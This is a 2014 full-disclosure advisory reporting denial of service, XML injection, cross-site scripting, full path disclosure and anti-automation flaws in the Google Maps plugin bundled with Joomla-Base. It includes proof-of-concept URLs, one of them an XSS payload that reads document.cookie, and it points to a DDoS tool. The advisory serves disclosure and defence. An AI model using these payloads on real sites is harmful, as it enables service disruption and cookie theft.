Date: Tue, 25 Feb 2014 20:09:02 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Multiple vulnerabilities in Joomla-Base

Hello list!

These are Denial of Service, XML Injection, Cross-Site Scripting, Full path
disclosure and Insufficient Anti-automation vulnerabilities in Joomla-Base.
This is package of Joomla with different plugins (with their
vulnerabilities).

These vulnerabilities are in Google Maps plugin for Joomla, which is used in
this package. In 2013-2014 I wrote advisories about multiple vulnerabilities
in Google Maps plugin (http://securityvulns.ru/docs29645.html,
http://securityvulns.ru/docs29670.html and
http://seclists.org/fulldisclosure/2014/Feb/53).

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of Joomla-Base, which includes this plugin.

After my informing, the developer removed this plugin from his package
(https://github.com/pabloarias/Joomla-Base/issues/1).

-------------------------
Affected vendors:
-------------------------

Pablo Arias
https://github.com/pabloarias/Joomla-Base

----------
Details:
----------

Denial of Service (WASC-10):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=google.com

Besides conducting DoS attack manually, it's also possible to conduct
automated DoS and DDoS attacks with using of DAVOSET
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).

XML Injection (WASC-23):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=site2/xml.xml

It's possible to include external xml-files. Which also can be used for XSS
attack:

XSS via XML Injection (WASC-23):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=site2/xss.xml

File xss.xml:

<?xml version="1.0" encoding="utf-8"?>
<feed>
  <title>XSS</title>
  <entry>
  </entry>
</feed>

Cross-Site Scripting (WASC-08):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php

This is possible with corresponding PHP settings, when warnings are shown.

Insufficient Anti-automation (WASC-21):

In this functionality there is no reliable protection from automated
requests.

Also in my third advisory concerning Google Maps plugin, I wrote about
security bypass for built-in domain restriction functionality and described
method of bypass protection against automated requests introduced in version
3.2. So even the latest version is vulnerable to IAA.

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua